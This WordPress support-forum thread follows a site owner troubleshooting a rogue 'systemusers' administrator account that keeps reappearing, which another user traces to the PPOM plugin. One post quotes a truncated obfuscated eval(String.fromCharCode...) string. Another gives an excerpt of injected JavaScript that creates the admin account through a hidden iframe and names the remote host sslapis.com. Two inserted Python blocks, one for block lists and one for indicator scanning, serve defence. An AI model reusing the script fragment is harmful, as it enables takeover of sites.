Title: Admin User creating attack
Last modified: October 2, 2019

---

# Admin User creating attack

 *  [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/)
 * I am facing a new admin user creation attack on one of my WooCommerce sites. The
   admin users are created with the username systemusers, using systemusers@gmailen.com
   as the email address. After the user is created, the admin and the user get new
   user created email notifications. Has anyone here faced this same problem before?
   How can I protect my site from this attack?
 * The first time the user was created, I found one vulnerable plugin on my site from
   a Wordfence scan. I have deleted that plugin now, installed the pro version of
   iThemes Security and enabled 2FA for admin users, but after that the user has still
   been created 5 times on my site.

Viewing 15 replies - 1 through 15 (of 20 total)


 *  [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/)
 * (@jnashhawkins)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11989872)
 * Block his IP address!
 * Block that email address.
 * Can he still get in as admin with 2FA? Call him!!! Fuss!
 * Can he do anything as admin? Or is this just annoying you?
 * [https://wordpress.org/support/article/hardening-wordpress/](https://wordpress.org/support/article/hardening-wordpress/)
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11991881)
 * [@jnashhawkins](https://wordpress.org/support/users/jnashhawkins/) When I block
   their IP, they create a new user using another IP. So IP blocking is not
   providing a solution for that.
 * Also, when I check the email log I can see that 2FA emails are being sent to
   their email address.
 * Yes, he is installing a new vulnerable plugin on my site and he is also checking all
   pages and site settings on the back-end.
 *  [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/)
 * (@jnashhawkins)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992064)
 * Can you block per CIDR notation (range of) IPs instead of using a single IP? 
   Or would that accidentally block some of your audience?
 * Have you asked the WordFence support?
 * Have you worked through the Hardening of WordPress link I sent you yet? Is the
   2FA actually trapping him then calling him? I’d think that the phone number for
   the 2FA would be somewhere in your database if your 2FA is using SMS. I might
   be wrong there but worth a look.
 * Have you mentioned this problem to your web host?
 * Have you mentioned this to the 2FA provider? Or is that WordFence provided?
 * Maybe ask on stack exchange.
 * I still think the IP blocks and using the Hardening tips should get you there.
 * There are a couple more good ideas and a few plugins mentioned in this article,
   too.
 * [https://kinsta.com/blog/wp-admin-login/](https://kinsta.com/blog/wp-admin-login/)
 * If you keep blocking this person at every turn you’ll probably discourage him/
   her at some point and they’ll move on to an easier target… so don’t give up!
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992361)
 * [@jnashhawkins](https://wordpress.org/support/users/jnashhawkins/) They are using
   different IPs, so we can’t block a particular range of IPs; they are using different
   ranges of IPs.
 * No, I haven’t contacted the WordFence support yet.
 * We have enabled 2FA using the iThemes Security Pro plugin, and we have enabled
   2FA by email notification, so when an admin user tries to log in with the correct
   username and password, as the next step they need to provide the 2FA code generated
   by iThemes Security.
 * Yes, I have contacted the web host; they also don’t know how the user is being created
   on my site.
 *  [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/)
 * (@jnashhawkins)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992461)
 * Oh, why not go with 2FA where the user logging in needs to provide a code via
   SMS?
 * That would be every time they log in. It’s a bit of a pain but might solve your
   problem pretty quickly.
 * [https://www.wpbeginner.com/plugins/how-to-add-two-factor-authentication-for-wordpress/](https://www.wpbeginner.com/plugins/how-to-add-two-factor-authentication-for-wordpress/)
 * Getting back to the IP address blocking. Just keep adding the IP address they
   use to login with each time. If you notice two adjacent IPs then look to creating
   a CIDR to block them. There is most likely a subnet that they are on unless they
   are spoofing IPs or running on botnets or proxies.
 * It’s highly unlikely the address they use would be the same as a regular user
   or else that might prompt the legit user to complain to their ISP which might
   help uncover your attacker once and for all.
 * I’d keep blocking.
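The CIDR suggestion in this reply, and the earlier worry about accidentally blocking legitimate visitors, can be checked before a range goes into the firewall. The following is an added example, not part of any participant's post; the addresses are constructed from documentation ranges and `propose_blocks` is a hypothetical helper name.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: source IPs of the rogue logins (documentation ranges).
OBSERVED = ["203.0.113.17", "198.51.100.7", "203.0.113.18",
            "192.0.2.200", "203.0.113.21", "203.0.113.17"]

def propose_blocks(ips, group_prefix=24, min_distinct=2):
    """Group IPv4 addresses by /group_prefix and suggest the tightest CIDR
    for each group that holds at least min_distinct distinct addresses.

    Returns (blocks, singles): blocks is a list of (cidr, seen, covered)
    tuples, singles is the list of addresses best blocked one by one.
    """
    groups = defaultdict(set)
    for raw in ips:
        addr = ipaddress.IPv4Address(raw.strip())   # raises on malformed input
        parent = ipaddress.ip_network(f"{addr}/{group_prefix}", strict=False)
        groups[parent].add(addr)

    blocks, singles = [], []
    for parent in sorted(groups):
        addrs = sorted(groups[parent])
        if len(addrs) < min_distinct:
            singles.extend(str(a) for a in addrs)
            continue
        # Widen from the lowest address until the highest one fits; the
        # result never grows past the /group_prefix parent network.
        cover = ipaddress.ip_network(f"{addrs[0]}/32")
        while addrs[-1] not in cover:
            cover = cover.supernet()
        blocks.append((str(cover), len(addrs), cover.num_addresses))
    return blocks, singles

if __name__ == "__main__":
    blocks, singles = propose_blocks(OBSERVED)
    for cidr, seen, covered in blocks:
        print(f"block {cidr}: {seen} attacker IPs seen, {covered} addresses covered")
    for ip in singles:
        print(f"block {ip}/32")
```

The `covered` figure is the number to weigh against the `seen` count: two numerically adjacent addresses that straddle an alignment boundary can force a much wider block than expected.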
 *  [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/)
 * (@jnashhawkins)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992477)
 * I’d also keep calling my web host… Sometimes you’ll find a sympathetic ear who
   will escalate your problem to second level techs to help you more. The first 
   level guys don’t always make the right determinations first time through either.
 * Keep hounding them and don’t let them sell you anything else until you are satisfied
   with what you have already paid for.
 * I have no idea who your host is but sometimes you need to ‘pick up and move’ 
   or threaten to anyway.
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11992984)
 * I found the following code in the DB: `eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116,`
 * by checking this article
 * [https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/](https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/)
    -  This reply was modified 6 years, 7 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/).
 *  [JNashHawkins](https://wordpress.org/support/users/jnashhawkins/)
 * (@jnashhawkins)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-11998062)
 * Right.
 * Some of the technical ‘why’ explanations are interesting but the ‘hows’ usually
   boil down to the basics and repetition of those. Notice the mention of the IP
   address and I’m right tickled that WordFence tried to work with the host involved
   to deal with the real problem.
 * Also, consider the obfuscated code referenced can and most likely will change
   over time. The basics come back to help us though.
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12057528)
 * The attack has come back again; I don’t know how it’s happening. Can anyone help
   me to solve this attack?
 *  [nashe](https://wordpress.org/support/users/nashe/)
 * (@nashe)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097510)
 * [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
    Hi!
   I encountered the same problem. An administrator user called systemusers was
   suddenly created. I found that it’s linked with the plugin WooCommerce PPOM
   (Personalized Product Option Manager) (Plugin adds input fields on product page
   to personalized your product.). When the plugin is activated, the administrator
   “systemusers” is created on a detailed product with an additional field. In this
   case, the server tries to connect to this address: [https://sslapis.com/counter.php](https://sslapis.com/counter.php).
 * The function called is contentLoaded, and somewhere in the script we find a
   processNewUser function:

   ```
   // Excerpt as posted; the rest of the script was not included.
   function processNewUser(adminhref){
       var username = 'systemusers';
       var email = 'systemusers@gmailen.com';
       var password = 'KYPzRkaJb0avdB';

       pfr=document.createElement('iframe');
       pfr.style.visibility='hidden';
       pfr.name='pfr';
       pfr.src=adminhref+'/user-new.php';

       pfr.onload=function(state){

       pfr.onload='';
   ```

 * At the moment I have deactivated the PPOM script and it stops the administrator user
   creation.
    If someone has another idea … Thanks
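A static check for the two artefacts posted in this thread, the `eval(String.fromCharCode(...))` string found in the database and the script fragment naming `systemusers` and `user-new.php`. This is an added example, not code from any participant or from Wordfence: it decodes the character codes as data without executing them and then looks for the strings quoted in the thread in both raw and decoded text; the sample rows and the function names are constructed for illustration.

```python
import re

# Strings quoted in this thread: rogue username, e-mail domain, remote host, admin page.
INDICATORS = ("systemusers", "gmailen.com", "sslapis.com", "user-new.php")
CHARCODE_ARGS = re.compile(r"String\.fromCharCode\(([\d\s,]*)", re.I)
EVAL_WRAPPED = re.compile(r"eval\s*\(\s*String\.fromCharCode", re.I)

def decode_charcodes(text):
    """Decode each String.fromCharCode(...) argument list as data (nothing is
    executed). A list cut off mid-way, as in the post above, is decoded as far
    as it goes."""
    decoded = []
    for match in CHARCODE_ARGS.finditer(text):
        codes = [int(n) for n in re.findall(r"\d+", match.group(1))]
        if codes:
            decoded.append("".join(chr(c) for c in codes if c < 0x110000))
    return decoded

def scan_rows(rows):
    """rows: iterable of (row_id, text) pairs, e.g. text columns from a
    database export. Returns one finding per suspicious row."""
    findings = []
    for row_id, text in rows:
        decoded = decode_charcodes(text)
        haystack = " ".join([text, *decoded]).lower()
        hits = [i for i in INDICATORS if i in haystack]
        if decoded or hits:
            findings.append({"row": row_id, "decoded": decoded, "indicators": hits,
                             "eval_wrapped": bool(EVAL_WRAPPED.search(text))})
    return findings

# Constructed sample rows (not taken from a real database).
ENCODED_HOST = ",".join(str(ord(ch)) for ch in "//sslapis.com/counter.php")
SAMPLE_ROWS = [
    (101, "Engraving text (max 20 characters)"),
    (102, "eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, "
          "116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116,"),
    (103, "<script>eval(String.fromCharCode(" + ENCODED_HOST + "))</script>"),
    (104, "<script>var email = 'systemusers@gmailen.com';</script>"),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

Row 102 is the truncated prefix quoted earlier in the thread; it decodes to plain JavaScript source text, which is why a search for the literal indicator strings alone would miss row 103.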
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097538)
 * [@nashe](https://wordpress.org/support/users/nashe/) Is the PPOM plugin creating that
   user?
    -  This reply was modified 6 years, 6 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/).
 *  [nashe](https://wordpress.org/support/users/nashe/)
 * (@nashe)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097589)
 * It seems it’s linked. It should not …
    Is PPOM activated on your site?
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097592)
 * [@nashe](https://wordpress.org/support/users/nashe/) Yes, I activated the PPOM for
   WooCommerce by N-MEDIA plugin on my site.
 *  [nashe](https://wordpress.org/support/users/nashe/)
 * (@nashe)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097624)
 * Try to test:
    -  delete the systemusers administrator (if not already done …); on my side I let
       it exist with another email and without rights.
    -  show a product with additional fields
    -  the systemusers user should be created in your backend administration
    -  delete systemusers
    -  deactivate PPOM
    -  and show the same product, without additional fields of course, and the problem
       should be fixed
 * About sslapis but not with PPOM : [https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/](https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/)
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/#post-12097637)
 * [@nashe](https://wordpress.org/support/users/nashe/) Let me check
    -  This reply was modified 6 years, 6 months ago by [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/).


The topic ‘Admin User creating attack’ is closed to new replies.

## Tags

 * [attack](https://wordpress.org/support/topic-tag/attack/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 20 replies
 * 3 participants
 * Last reply from: [nashe](https://wordpress.org/support/users/nashe/)
 * Last activity: [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack/page/2/#post-12097681)
 * Status: not resolved

